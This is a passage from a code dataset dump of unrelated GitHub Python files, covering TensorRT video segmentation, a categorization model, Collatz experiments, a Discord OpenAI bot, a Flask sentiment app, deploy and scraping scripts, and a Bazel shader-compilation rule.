k==ord('q'):\n\t\t\t\tbreak\n\n\t\t\tfps=0.9*fps+0.1/(duration)\n\t\t\tprint('FPS=:{:.2f}'.format(fps))\n\t\t\tret,frame=src.read()\n\n\tdef parse_or_load(self):\n\t\tlogger= trt.Logger(trt.Logger.INFO)\n\t\t#we want to show logs of type info and above (warnings, errors)\n\t\t\n\t\tif os.path.exists(self.enginepath):\n\t\t\tlogger.log(trt.Logger.INFO, 'Found pre-existing engine file')\n\t\t\twith open(self.enginepath, 'rb') as f:\n\t\t\t\trt=trt.Runtime(logger)\n\t\t\t\tengine=rt.deserialize_cuda_engine(f.read())\n\n\t\t\treturn engine, logger\n \n\t\telse: #parse and build if no engine found\n\t\t\twith trt.Builder(logger) as builder:\n\t\t\t\tbuilder.max_batch_size=self.max_batch_size\n\t\t\t\t#setting max_batch_size isn't strictly necessary in this case\n\t\t\t\t#since the onnx file already has that info, but its a good practice\n\t\t\t\t\n\t\t\t\tnetwork_flag = 1 << int(trt.NetworkDefinitionCreationFlag.EXPLICIT_BATCH)\n\t\t\t\t\n\t\t\t\t#since the onnx file was exported with an explicit batch dim,\n\t\t\t\t#we need to tell this to the 
builder. We do that with EXPLICIT_BATCH flag\n\t\t\t\t\n\t\t\t\twith builder.create_network(network_flag) as net:\n\t\t\t\t\n\t\t\t\t\twith trt.OnnxParser(net, logger) as p:\n\t\t\t\t\t\t#create onnx parser which will read onnx file and\n\t\t\t\t\t\t#populate the network object `net`\t\t\t\t\t\n\t\t\t\t\t\twith open(self.onnxpath, 'rb') as f:\n\t\t\t\t\t\t\tif not p.parse(f.read()):\n\t\t\t\t\t\t\t\tfor err in range(p.num_errors):\n\t\t\t\t\t\t\t\t\tprint(p.get_error(err))\n\t\t\t\t\t\t\telse:\n\t\t\t\t\t\t\t\tlogger.log(trt.Logger.INFO, 'Onnx file parsed successfully')\n\n\t\t\t\t\t\tnet.get_input(0).dtype=trt.DataType.HALF\n\t\t\t\t\t\tnet.get_output(0).dtype=trt.DataType.HALF\n\t\t\t\t\t\t#we set the inputs and outputs to be float16 type to enable\n\t\t\t\t\t\t#maximum fp16 acceleration. Also helps for int8\n\t\t\t\t\t\t\n\t\t\t\t\t\tconfig=builder.create_builder_config()\n\t\t\t\t\t\t#we specify all the important parameters like precision, \n\t\t\t\t\t\t#device type, fallback in config object\n\n\t\t\t\t\t\tconfig.max_workspace_size = self.maxworkspace\n\n\t\t\t\t\t\tif self.precision_str in ['FP16', 'INT8']:\n\t\t\t\t\t\t\tconfig.flags = ((1<=self.n_samples, f'Not enough images available. Requested {self.n_samples} images for calibration but only {len(all_images)} are avialable in {self.imgdir}'\n\t\tused=all_images[:self.n_samples]\n\t\tself.images=[os.path.join(self.imgdir,f) for f in used]\n\n\t\tnbytes=self.batch_size*3*self.input_size[0]*self.input_size[1]*self.iotype(1).nbytes\n\t\tself.buffer=cuda.mem_alloc(nbytes)\n\n\tdef preprocess(self, img):\n\t\timg=cv2.resize(img,self.input_size)\n\t\timg=img[...,::-1] #bgr2rgb\n\t\timg=img.astype(np.float32)/255\n\t\timg=(img-self.pp_mean)/self.pp_stdev #normalize\n\n\t\timg=np.transpose(img,(2,0,1)) #HWC to CHW format\n\t\timg=np.ascontiguousarray(img[None,...]).astype(self.iotype)\n\t\t#NCHW data of type used by engine input\n\t\treturn img\n\n\tdef get_batch(self, names):\n\t\tif self.images_read+self.batch_size < self.n_samples:\n\t\t\tbatch=[]\n\t\t\tfor idx in range(self.images_read,self.images_read+self.batch_size):\n\t\t\t\timg=cv2.imread(self.images[idx],1)\n\t\t\t\tintensor=self.preprocess(img)\n\t\t\t\tbatch.append(intensor)\n\n\t\t\tbatch=np.concatenate(batch, axis=0)\n\t\t\tcuda.memcpy_htod(self.buffer, batch)\n\t\t\tself.images_read+=self.batch_size\n\t\t\treturn [int(self.buffer)]\n\t\telse:\n\t\t\treturn None\n\t\t\n\tdef get_batch_size(self):\n\t\treturn self.batch_size\n\n\tdef read_calibration_cache(self):\n\t\tif os.path.exists(self.cache_path):\n\t\t\twith open(self.cache_path, \"rb\") as f:\n\t\t\t\treturn f.read()\n\n\tdef write_calibration_cache(self, cache):\n\t\twith open(self.cache_path, 'wb') as f:\n\t\t\tf.write(cache)\n\ndef infervideo_2DLAs(infile, onnxpath, calibrator=None, precision='INT8',display=False):\n\tsrc=cv2.VideoCapture(infile)\n\tseg1=TRTSegmentor(onnxpath, colors, device='DLA', precision=precision ,calibrator=calibrator, dla_core=0)\n\tseg2=TRTSegmentor(onnxpath, colors, device='DLA', precision=precision ,calibrator=calibrator, dla_core=1)\n\tret1,frame1=src.read()\n\tret2,frame2=src.read()\n\tfps=0.0\n\t\n\twhile ret1 and ret2:\n\t\tintensor1=seg1.preprocess(frame1)\n\t\tintensor2=seg2.preprocess(frame2)\n\t\t\n\t\tstart=time.time()\n\n\t\tcuda.memcpy_htod_async(seg1.d_input, intensor1, seg1.stream)\n\t\tcuda.memcpy_htod_async(seg2.d_input, intensor2, seg2.stream)\n\n\t\tseg1.context.execute_async_v2(seg1.bindings, seg1.stream.handle, None)\n\t\tseg2.context.execute_async_v2(seg2.bindings, 
seg2.stream.handle, None)\n\n\t\tcuda.memcpy_dtoh_async(seg1.output, seg1.d_output, seg1.stream)\n\t\tcuda.memcpy_dtoh_async(seg2.output, seg2.d_output, seg2.stream)\n\n\t\tseg1.stream.synchronize()\n\t\tseg2.stream.synchronize()\n\n\t\tend=time.time()\n\t\tif display:\n\t\t\tdrawn1=seg1.draw(frame1)\n\t\t\tdrawn2=seg2.draw(frame2)\n\t\t\tcv2.imshow('segmented1', drawn1)\n\t\t\tcv2.imshow('segmented2', drawn2)\n\t\t\tk=cv2.waitKey(1)\n\t\t\tif k==ord('q'):\n\t\t\t\tbreak\n\n\t\tfps=0.9*fps+0.1*(2.0/(end-start))\n\t\tprint('FPS = {:.3f}'.format(fps))\n\n\t\tret1,frame1=src.read()\n\t\tret2,frame2=src.read()\n\nif __name__ == '__main__':\n\n\tparser=argparse.ArgumentParser(description='TensorRT python tutorial')\n\t\n\tparser.add_argument('--precision', type=str, \n\t\tdefault='fp16', choices=['int8', 'fp16', 'fp32'],\n\t\thelp='precision FP32, FP16 or INT8')\n\n\tparser.add_argument('--device', type=str, \n\t\tdefault='gpu', choices=['gpu', 'dla', 'dla0', 'dla1', '2DLAs'],\n\t\thelp='GPU, DLA or 2DLAs')\n\n\tparser.add_argument('--infile', type=str, required=True,\n\t\thelp='path of input video file to infer on')\n\n\targs=parser.parse_args()\n\n\tcalibrator=Calibrator('./val2017/', 5000)\n\n\tif args.device=='2DLAs':\n\t\tprecision=args.precision.upper()\n\t\tinfervideo_2DLAs(args.infile, './segmodel.onnx', calibrator, precision)\n\n\telse:\n\t\tdevice=args.device.upper()\n\t\tprecision=args.precision.upper()\n\t\tdla_core=int(device[3:]) if len(device)>3 else 0\n\t\tdevice=device[:3]\n\t\t\n\t\tseg=TRTSegmentor('./segmodel.onnx', colors, \n\t\t\tdevice=device, \n\t\t\tprecision=precision,\n\t\t\tcalibrator=calibrator, \n\t\t\tdla_core=dla_core)\n\t\t\n\t\tseg.infervideo(args.infile)\n\n\tprint('Inferred successfully')\n","repo_name":"spmallick/learnopencv","sub_path":"industrial_cv_TensorRT_python/pytrt.py","file_name":"pytrt.py","file_ext":"py","file_size_in_byte":12635,"program_lang":"python","lang":"en","doc_type":"code","stars":19546,"dataset":"github-code","pt":"20"} +{"seq_id":"24163468769","text":"'''\n!!! INCOMPLETE !!!\n\nRational Model of Categorization (Anderson 1990-91)\n- - - - - - - - - - - - - - - - - - - - - - - - - - - \n\nBasic Idea:\n + a category label is a feature to be predicted by category-specific generative models of the data\n + the feature can be predicted optimially by combining:\n (a) the liklihood of an object belonging to a cluster given it's features\n (b) the liklihood of an object having some feature given the cluster (the predicted feature in this case is the category label)\n\n P(j|F) = P(k|F) * P(j|k)\n\n for all K clusters\n\n P(k|F) is the posterior probability that an object belongs to a cluster (relative to all other clusters). 
This is given by a luce-choice over the probilities of all clusters:\n\n P(k|F) = p(k) * p(F|k) / sum( p(k) * p(F|k) for all k in K )\n\n p(k) * p(F|k) <-- that part is naive bayes i think\n\n p(k) is given by the equation:\n\n p(k) = c * n_k / (1 - c) + cn\n\n n_k: number of items in partition k\n n: total number of items\n \n ^ so essentially, i think that those combined give us a baserate of a given cluster\n\n as Anderson (1991) puts it: this creates a strong \"bias to put new items into [already existing] large categories\"\n\n The probability that something is asigned to a new category is:\n P(0) = (1 - c) / ( (1-c) + cn )\n\n p(F|k) = product( P(j|k) for j in F)\n\n Notes:\n - the coupling parameter C tries to manipulate the liklihood that exemplars will be \"grouped\" into a cluster\n - when C is 0: each example gets it's own cluster\n - wtf is going on this the discrete -vs- continuous thing?\n\n\n'''\nimport numpy as np; np.set_printoptions(linewidth = 10000)\n\nimport matplotlib.pyplot as plt \n\ng = 20\nparam_space = [\n np.linspace(0,1,g),\n np.linspace(0,1,g),\n]\nmesh = np.array(np.meshgrid(*param_space)).reshape(2,g*g).T\n\ndef gaussian_kernelv(x, data_mean, data_std):\n exponent = np.exp(- ((x - data_mean) ** 2 / (2 * data_std ** 2) ))\n return (1 / (np.sqrt(2 * np.pi) * data_std) * exponent)\n\n\n# RMC\ndef predict_rmc(inputs, data, labels):\n # we want: P(j|F) <-- ie, given a set of features (the stimulus), what is the liklihood it has a feature j? (j being the category label)\n # we need: p(k|F) and p(j|k)\n\n\n # just going to assume we already know the clusters (lets say C is zero and each exemplar is it's own cluster)\n p_j__k = None\n p_k__F = None\n\n # get prob k given f: prob_k__F\n p_k = np.array([1 / data.shape[0] for cluster in data]) # <-- since each examplar has an equal base rate (im kind of cheating here)\n p_F__k = np.array([gaussian_kernelv(inputs, cluster, .1) for cluster in data])\n p_F__k = np.product(p_F__k, axis = -1)\n p_k__F = (p_F__k * p_k) / np.sum(p_F__k * p_k, axis = 0)\n\n # get prob j given k: p_j__k <-- i think this is just the category association weights\n p_j__k = np.zeros([inputs.shape[0], len(np.unique(labels))])\n p_j__k[labels == 'Iris-setosa',0] = 1\n p_j__k[labels == 'Iris-versicolor',1] = 1\n p_j__k[labels == 'Iris-virginica',2] = 1\n\n\n # combine them:\n response_probs = p_k__F @ p_j__k # <-- there's something wrong here, since the sum of the probabilities dont add to 1\n\n return response_probs\n\n\n\n\n\n\n\n\n\n# naive_bayes probability\ndef predict_nb(inputs, data, labels):\n c = {}\n for category in categories:\n c[category] = {\n 'data': data[labels == category],\n }\n c[category]['base_rate'] = c[category]['data'].shape[0] / data.shape[0]\n\n class_probabilities = []\n\n for category in categories:\n class_probabilities.append(\n np.multiply(\n gaussian_kernelv(inputs, c[category]['data'].mean(axis = 0), c[category]['data'].std(axis = 0)),\n c[category]['base_rate']\n )\n )\n\n class_probabilities = np.product(np.array(class_probabilities), axis = -1).T\n return class_probabilities / class_probabilities.max(axis = 1, keepdims = True) # <-- luce choice\n\n\nif __name__ == '__main__':\n data = np.genfromtxt('iris.csv', delimiter = ',',dtype = float)[:,:-1]\n labels = np.genfromtxt('iris.csv', delimiter = ',', dtype = str)[:,-1]\n categories = np.unique(labels)\n \n # data = np.array([\n # [.1, .4],\n # [.2, .3],\n # [.3, .2],\n # [.4, .1],\n\n # [.6, .9],\n # [.7, .8],\n # [.8, .7],\n # [.9, .6],\n # ])\n\n # labels = [\n # 
0,0,0,0, 1,1,1,1, \n # ]\n\n # categories = np.unique(labels)\n\n probs = predict_rmc(\n data, data, labels\n )\n\n # probs = predict_nb(\n # # input data, reference data, reference labels\n # data, data, labels\n # )\n \n\n ##__Plot Results\n import matplotlib.pyplot as plt \n\n fig, ax = plt.subplots(\n 1,1, \n # figsize = [4,2]\n )\n ax.imshow(\n probs,\n cmap = 'binary', aspect = 'auto', vmin = 0, vmax = 1\n )\n ax.set_xticks(range(len(categories)))\n ax.set_xticklabels(categories)\n\n ax.set_yticks(range(data.shape[0]))\n ax.set_yticklabels([\n ' ' if categories[probs[item,:].argmax()] == labels[item] else 'x'\n for item in range(data.shape[0])\n ])\n ax.set_ylabel('items\\n(x = incorrect prediction)\\n')\n ax.set_title('Class Probabilities')\n\n plt.savefig('test.png')\n\n\n\n # ##__Plot Results\n # import matplotlib.pyplot as plt \n\n # fig, [ax,ax2] = plt.subplots(1,2, figsize = [4,2])\n\n # ax.imshow(\n # probs,\n # cmap = 'binary', aspect = 'auto', vmin = 0, vmax = 1\n # )\n # ax.set_xticks(range(len(categories)))\n # ax.set_xticklabels(categories)\n\n # ax.set_yticks(range(data.shape[0]))\n # ax.set_yticklabels([\n # ' ' if categories[probs[item,:].argmax()] == labels[item] else 'x'\n # for item in range(data.shape[0])\n # ])\n # ax.set_ylabel('items\\n(x = incorrect prediction)\\n')\n # ax.set_title('Class Probabilities')\n\n\n # ax2.scatter(\n # *data.T,\n # c = labels\n # )\n\n # plt.tight_layout()\n # plt.savefig('test.png')\n","repo_name":"mw3i/cogmods","sub_path":"_/RMC-exemplar_reduced.py","file_name":"RMC-exemplar_reduced.py","file_ext":"py","file_size_in_byte":6121,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"20"} +{"seq_id":"42572723262","text":"willend = []\n\nstart = 2\nstop = 40\nprint(f\"{start} -> {stop}\")\nfor i in range(2, 40):\n n = i\n while True:\n if n not in willend:\n willend.append(n)\n if n % 2 == 0:\n # turns into float during division\n n = int(n / 2)\n else:\n n = n * 3 + 1\n if n == 1:\n break\n else:\n break\n \n # return n\n\nprint()\nwillend.sort()\n# WOW! 
Gap-between-nums bar chart!\n# for i in range(1, len(willend)):\n# dif = (willend[i] - willend[i-1])\n# if dif > 1:\n# print(\"x, \" * dif)\nprint(willend)\n# for i in range(1, len(willend)):\n# dif = (willend[i] - willend[i-1])\n# if dif > 1:\n# print(\"x, \", end=\"\")\n# # print(\"x, \" * (dif - 1), end=\"\")\n# print(willend[i], end=\", \")\nprint()\n\nn = int(input())\ncycles = 1\nwhile True:\n if n == 1:\n print(cycles)\n break\n if n % 2 == 0:\n # turns into float during division\n n = int(n / 2)\n else:\n n = n * 3 + 1\n cycles += 1\n\n\n\nfor i in range(2, 15):\n n = i\n print(n, end=\", \")\n while True:\n if n % 2 == 0:\n # turns into float during division\n n = int(n / 2)\n else:\n n = n * 3 + 1\n print(n, end=\", \")\n if n == 1:\n print(\"end\", end=\"\\n\")\n break\n # return n\n","repo_name":"DustinWestGlow/Code","sub_path":"collatz/collatz.py","file_name":"collatz.py","file_ext":"py","file_size_in_byte":1386,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"20"} +{"seq_id":"16564998777","text":"from PyQt5.QtWidgets import QGroupBox\n\nfrom utils import get_ui_spacing\n\n\nclass BaseGroupBoxWidget(QGroupBox):\n\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n\n margin = get_ui_spacing(\"lg\")\n self.setContentsMargins(margin, margin, margin, margin)\n","repo_name":"briannice/snoop","sub_path":"widgets/base/base_group_box_widget.py","file_name":"base_group_box_widget.py","file_ext":"py","file_size_in_byte":298,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"20"} +{"seq_id":"8232169724","text":"from sympy import symbols, sympify, lambdify\nfrom sympy.abc import x, h\nimport variants\n\nROUNDBASE = 2\nINTER_ORD = 5\nDERIV_ORD = 1\nKNOT = 0\nN_KNOTS = 11\n\nv = variants.v10\nlb = v['a']\nrb = v['b']\ny = lambdify(x, v['y'])\ngap = round((rb - lb) / (N_KNOTS - 1), ROUNDBASE)\n\n# builds polynom of given order\nknots = symbols(f\"x:{INTER_ORD + 1}\")\nvalues = symbols(f\"y:{INTER_ORD + 1}\")\n\npolynom = sympify('0')\nfor i in range(INTER_ORD + 1):\n monom = sympify('1')\n for j in range(INTER_ORD + 1):\n if i == j: continue\n monom *= (x - knots[j]) / sympify(f\"{i}-{j}\", evaluate=False) / h\n monom *= values[i]\n polynom += monom\n\n\nderiv = polynom.diff(x, DERIV_ORD)\n\npt = lb\n\nfor i in range(INTER_ORD + 1):\n deriv = deriv.subs(knots[i], pt).subs(values[i], y(pt))\n pt += gap\n\nderiv = deriv.subs(h, gap).simplify()\n\nderiv.subs(x, lb + KNOT * gap)\n","repo_name":"the-makcym/nummeth","sub_path":"lab3.py","file_name":"lab3.py","file_ext":"py","file_size_in_byte":863,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"20"} +{"seq_id":"3396779053","text":"from discord.ext import commands\n\nfrom cogs.src._chatGpt import Gpt\n\n\nclass openai(commands.Cog):\n def __init__(self, bot, api_key):\n self.bot = bot\n self.gpt = Gpt(api_key)\n\n @commands.command()\n async def chat_gpt(self, ctx, *args):\n texte = \" \".join(args)\n response = self.gpt.call_chat(texte)\n await self.bot.send_message(ctx, response, False)\n\n @commands.command()\n async def img_gpt(self, ctx, *args):\n texte = \" \".join(args)\n response = self.gpt.call_image(texte)\n await self.bot.send_message(ctx, response, False)\n\n @commands.command()\n async def trad_gpt(self, ctx, *args):\n lang = args[0]\n texte = \" \".join(args[1:])\n response = self.gpt.call_traduction(lang, texte)\n await self.bot.send_message(ctx, response, 
False)\n","repo_name":"DevRickyCst/chatGptDiscord","sub_path":"cogs/openai.py","file_name":"openai.py","file_ext":"py","file_size_in_byte":833,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"20"} +{"seq_id":"24221704576","text":"#!/usr/bin/env python\n# coding:utf-8\nimport _env\nfrom _route import route\nfrom zapp._WEB.model.session import Session\nfrom zapp._WEB.view._rpc.client import ClientRpcView as View\nfrom zapp._WEB.model.sso_sign import sso_sign\nfrom zapp._WEB.model.id_by_sso import id_by_sso_id, sso_id_by_id\nfrom zapp._WEB.model.ob_mail import ob_mail_set \nfrom zapp._WEB.view._rpc import RpcView, rpc_url, Err, logined, LoginedRpcView\nfrom zapp._WEB.model.sign import Sign\nfrom zapp._WEB.model.user_info import user_info_id_get, user_info_id_set\nfrom z42.config import HOST\nfrom zapp._WEB.model.ob import Ob\n\n@route(\"sso\")\nclass _(View):\n def login(self, session, user_info_id, expires_days):\n sso_id, binary = Session.decode(session, False)\n\n user_id = id_by_sso_id(sso_id)\n self.set_cookie(\"S\", Session.set(user_id, binary), domain=\".\"+HOST, expires_days=expires_days)\n\n if user_info_id != user_info_id_get(sso_id):\n self.redirect(\n sso_sign(\n sso_id,\n binary,\n \"user.sync\",\n dict(\n info = \"mail name ico sign phone\",\n )\n )\n )\n\n def sync( self, sso_id, user_info_id, mail=None, ico=None, name=None, sign=None, phone=None,):\n user_id = id_by_sso_id(sso_id)\n ob = Ob.find_one(dict(id=user_id))\n if ob is None:\n ob = Ob(dict(id=user_id))\n\n if ico:\n ob.ico = ico\n\n if name:\n ob.name = name\n\n ob.save()\n\n if sign:\n Sign.new(user_id, sign)\n\n if mail is not None:\n ob_mail_set(user_id, mail)\n\n user_info_id_set(sso_id, user_info_id)\n\n\n\nif __name__ == \"__main__\":\n pass\n# print user_info_id_get(9912698)\n# print sso_id, user_id, \"!!!!!!!\", type(user_id), ob.name\n\n\n","repo_name":"PegasusWang/collection_python","sub_path":"z42/zapp/_WEB/view/rpc/sso.py","file_name":"sso.py","file_ext":"py","file_size_in_byte":1877,"program_lang":"python","lang":"en","doc_type":"code","stars":123,"dataset":"github-code","pt":"20"} +{"seq_id":"74293331250","text":"#!/usr/bin/env python3\n\nimport argparse\nimport sys, os\nimport logging\nimport subprocess\nimport shutil\nimport tempfile\nimport json\n\n\n#global paths variables\nwith open('.deploy') as json_file:\n _app_repo = json.load(json_file)\n\n\n#logging\nlogging.basicConfig()\n_logger = logging.getLogger(\"Activate\")\n_logger.setLevel(logging.DEBUG)\n\ndef _parse_input():\n\t# Create the parser and add arguments\n\tparser = argparse.ArgumentParser()\n\tparser.add_argument(\"-v\", dest='version', help=\"Version to activate\")\n\tparser.add_argument(\"-a\", dest='app', required=True, help=\"App\", choices=['server','web'])\n\t\n\targs = parser.parse_args()\n\tsource = _app_repo[args.app]\n\n\treturn args.version, source, args.app\n\n\n\ndef run(version, source, app):\n\tdestination = os.path.join('src',app)\n\t_logger.info(\"Building destination path {0}\".format(destination))\n\n\t# validate input ( version, app, phase, process)\n\t_logger.info(\"Fetching {0} from {1}\".format(version, source))\n\n\tnew_version = not os.path.exists(destination)\n\tif new_version:\n\t\tcmd = \"git clone \"+source+ \" \"+ destination\n\t\t_logger.debug(\"{0}\".format(cmd))\n\t\toutput = subprocess.check_output(cmd.split())\n\t\t_logger.info(output)\n\n\tif version and not new_version:\n\t\tcwd = os.getcwd()\n\t\tos.chdir(cwd)\n\t\tcmd = \"git checkout \"+ (version or 
'')\n\t\t_logger.debug(\"{0}\".format(cmd))\n\t\toutput = subprocess.check_output(cmd.split())\n\t\t_logger.info(output)\n\n\n\treturn True\n\n\nif __name__ == '__main__':\n\tversion, source, app= _parse_input()\n\t_logger.info(\"--------------------------\")\n\t_logger.info(\"Version: {0}\".format(version))\n\t_logger.info(\"Source: {0}\".format(source))\n\t_logger.info(\"App: {0}\".format(app))\n\t_logger.info(\"--------------------------\")\n\n\tif not run(version, source, app):\n\t\t_logger.info(\"--------------------------\")\n\t\t_logger.info(\"Deploy failed\")\n\t\t_logger.info(\"--------------------------\")\n\n\t\tsys.exit(-1)\n\telse:\n\t\t_logger.info(\"--------------------------\")\n\t\t_logger.info(\"Deploy completed\")\n\t\t_logger.info(\"--------------------------\")\n\n\n\n\n\n","repo_name":"enzomar/omb","sub_path":"deploy.py","file_name":"deploy.py","file_ext":"py","file_size_in_byte":1989,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"20"} +{"seq_id":"36796808888","text":"#!/usr/bin/python\n#Andrew Stershic, 10/20/2014\n\ndef str2num(a):\n #remove comma from large numbers\n if (len(a) == 0):\n return 0\n return float(a.replace(',',''))\n\nimport sys\nimport re\nimport mechanize\n\n#set target url\nurl = 'http://commerce.nic.in/eidb/icomq.asp'\nyear = 2014\nif len(sys.argv) > 1:\n\tyear = sys.argv[1]\nfruitcode = \"0702\"\n\nbr = mechanize.Browser()\nbr.open(url)\n\nbr.select_form(name=\"form1\")\n\n#set year\nbr[\"yy1\"] = [str(year)]\n\n#select tomato = \"0702\"\nbr[\"hscode\"] = fruitcode\n\n#submit\nresponse = br.submit()\n\n#save results\n#f = open(\"tmp.htm\",\"w\")\n#f.write(response.read())\n#f.close()\n\n\n#read results\nfrom bs4 import BeautifulSoup\n\n#page = open('tmp.htm','r')\npage = response.read() \nsoup = BeautifulSoup(page)\n\nallTR = soup.find_all('tr')\nTR1 = []\nTR2 = []\nfor i in range(0,len(allTR)):\n tr = allTR[i]\n tds = tr.find_all('td')\n for td in tds:\n# print td.text.strip()\n if (i == 1):\n TR1.append(str(td.text.strip()))\n if (i == 2):\n TR2.append(str(td.text.strip()))\n\n#save results to variables\nsNo = TR1[0]\nHSCode = TR1[1]\nCommodity = TR1[2]\nQtyYear = str2num(TR1[3])\nTotImportYear = str2num(TR2[3])\nPctShareYear = str2num(TR1[4])\nQtyCurrent = str2num(TR1[5])\nTotImportCurrent = str2num(TR2[5])\nPctShareCurrent = str2num(TR1[6])\nPctGrowth = str2num(TR1[7])\nTotImportPctGrowth = str2num(TR2[7])\n\n\nline = \"%s,%s,%s,%s,%f,%f,%f,%f,%f,%f,%f,%f\\n\" % (year,sNo,HSCode,Commodity,QtyYear,TotImportYear,PctShareYear,QtyCurrent,TotImportCurrent,PctShareCurrent,PctGrowth,TotImportPctGrowth)\nheader = \"#year,sNo,HSCode,Commodity,QtyYear,TotImportYear,PctShareYear,QtyCurrent,TotImportCurrent,PctShareCurrent,PctGrowth,TotImportPctGrowth\\n\"\n\nf = open(\"commerce_output.csv\",'w')\nf.write(header)\nf.write(line)\nf.close()\n\n\n#results (commented)\n#***---results---***\n#sNo 1.\n#HSCode 0702\n#Commodity TOMATOES, FRESH OR CHILLED\n#QtyYear 1.38\n#TotImportYear 266916195.69\n#PctShareYear 0.0\n#QtyCurrent 1.78\n#TotImportCurrent 271543390.74\n#PctShareCurrent 0.0\n#PctGrowth 29.17\n#TotImportPctGrowth 1.73\n\n","repo_name":"astershic/ceres","sub_path":"commerce/commerce.py","file_name":"commerce.py","file_ext":"py","file_size_in_byte":2060,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"20"} +{"seq_id":"12931624029","text":"from typing import List, Tuple\n\n\ndef calc_figure_area(points: List[Tuple[float]]) -> float:\n \"\"\"Функция расчёта 
площади фигуры по координатам точек на плоскости.\"\"\"\n total = 0\n for i in range(len(points)):\n if len(points[i]) != 2:\n raise ValueError(\n 'Для расчёта площади необходимо '\n 'два значения в одной координате'\n )\n if i == len(points) - 1:\n break\n if (not isinstance(points[i][0], (int, float))\n or not isinstance(points[i][1], (int, float))):\n raise TypeError(\n 'Для расчёта площади необходимо передавать численные значения'\n 'координат точек на плоскости'\n )\n side_a = abs(points[i][1])\n side_b = abs(points[i+1][1])\n high = points[i+1][0] - points[i][0]\n s = high * (side_a + side_b) / 2\n total += s\n return total\n","repo_name":"RoostiqueTheMan/test_work_for_sigma","sub_path":"calc_figure_area.py","file_name":"calc_figure_area.py","file_ext":"py","file_size_in_byte":1113,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"20"} +{"seq_id":"26899645308","text":"import os\nimport pickle\n\nfrom flask import request\nfrom flask import jsonify\nfrom flask import Flask, render_template\nfrom keras.models import load_model\n\nfrom train import train\nfrom word2vec import find_similarity, load_embedding\nfrom utils import read_data, preprocess_df, tokenize_data\nfrom constants import MAX_WORDS\n\napp = Flask(__name__)\n\n\n@app.route('/')\ndef my_form():\n return render_template('index.html')\n\n\n@app.route('/', methods=['POST'])\ndef my_form_post():\n request_dict = request.form.to_dict()\n sentiment = False\n word2vec = False\n\n if 'text' in request_dict.keys():\n text = request.form['text']\n text = read_data(text)\n text = preprocess_df(text)\n text = tokenize_data(tokenizer, text['review'], max_words=MAX_WORDS)\n score = model.predict(text)\n\n if score > 0.5:\n label = 'This sentence is positive'\n elif score == 0.5:\n label = 'This sentence is neutral'\n else:\n label = 'This sentence is negative'\n sentiment = True\n\n if 'word2vec' in request_dict.keys():\n word = request.form['word2vec']\n print(word)\n similar_df = find_similarity(word, embedding)\n print(similar_df)\n column_names = similar_df.columns.values\n row_data = list(similar_df.values.tolist())\n link_column = \"Patient ID\"\n word2vec = True\n\n if sentiment and word2vec:\n return render_template('index.html', variable=label, column_names=column_names, row_data=row_data, link_column=link_column, zip=zip)\n elif sentiment:\n return render_template('index.html', variable=label)\n elif word2vec:\n return render_template('index.html', column_names=column_names, row_data=row_data, link_column=link_column, zip=zip)\n else:\n return render_template('index.html')\n\n\nif __name__ == \"__main__\":\n print('Loading embedding...')\n embedding = load_embedding()\n print('Success!')\n\n if not os.path.exists(os.path.join('models', 'sentiment_analysis_model.h5')):\n train()\n model = load_model(os.path.join('models', 'sentiment_analysis_model.h5'))\n # loading\n with open('tokenizer.pickle', 'rb') as handle:\n tokenizer = pickle.load(handle)\n\n app.run(port='8088', threaded=False)\n","repo_name":"odedovadia/WebML","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2286,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"20"} +{"seq_id":"30592762441","text":"import subprocess\nimport os\n\nf = open(\"tsvFiles.txt\")\nf2 = open(\"id.txt\",\"w\")\n\nfor d in f:\n\td = d.rstrip()\n\twords = d.split(\"/\")\n\tcm = \"cp \" + d + \" temp\"\n\tos.system(cm)\n\tos.system(\"sed -i '1d' temp\")\n\tos.system(\"awk '{print 
$2,$3,$4,$5,$6,$7}' temp >> optitype.hla.txt\")\n\tf2.write(words[2])\n\tf2.write(\"\\n\")\nf.close()\nf2.close()\n\n\n","repo_name":"felixfan/pipelines","sub_path":"NGSHLATying/OptiTypeReadHLAgeno.py","file_name":"OptiTypeReadHLAgeno.py","file_ext":"py","file_size_in_byte":331,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"20"} +{"seq_id":"31682266160","text":"def get_varying_def(source_file, varying_defs, default_def):\n for varying_def in varying_defs:\n if source_file.dirname == varying_def.dirname:\n return varying_def\n\n return default_def\n\n\ndef _shaderc_impl(ctx):\n shaderc_path = ctx.attr.tooling.files.to_list()[0].path\n print('Using shader tooling: ' + shaderc_path)\n\n common = [\n f for t in ctx.attr.common for f in t.files.to_list()\n ]\n\n shaders = [\n f for t in ctx.attr.shaders for f in t.files.to_list()\n ]\n bgfx_shader = ctx.attr.bgfx_shader\n\n runtime_files = []\n header_out = ctx.actions.declare_file('generated_shaders.hpp')\n\n\n frags_and_verts = []\n varying_defs = []\n root_varying_def = None\n frags = []\n verts = []\n\n for f in shaders:\n if 'varying.def.sc' in f.short_path:\n varying_defs.append(f)\n\n if root_varying_def == None or len(root_varying_def.short_path) > len(f.short_path):\n root_varying_def = f\n else:\n frags_and_verts.append(f)\n\n\n shader_params = [\n ('glsl', 'linux', '440'),\n ('spirv', 'linux', 'spirv'),\n ('metal', 'osx', 'metal'),\n ('dx11', 'windows', '420'),\n ]\n\n\n for f in frags_and_verts:\n name = f.basename.replace('.sc', '')\n outdir = f.dirname.split('resources/shaders')[1].strip('/')\n\n relative_path = name\n if outdir != '':\n relative_path = outdir + '/' + name\n\n shader_type = ''\n if '.fs' in name:\n shader_type = 'f'\n frags.append((name.replace('.fs', ''), relative_path, outdir))\n elif '.vs' in name:\n shader_type = 'v'\n verts.append((name.replace('.vs', ''), relative_path, outdir))\n\n for render_type_dir, platform, render_type in shader_params:\n outpath = 'resources/shaders/' + render_type_dir + 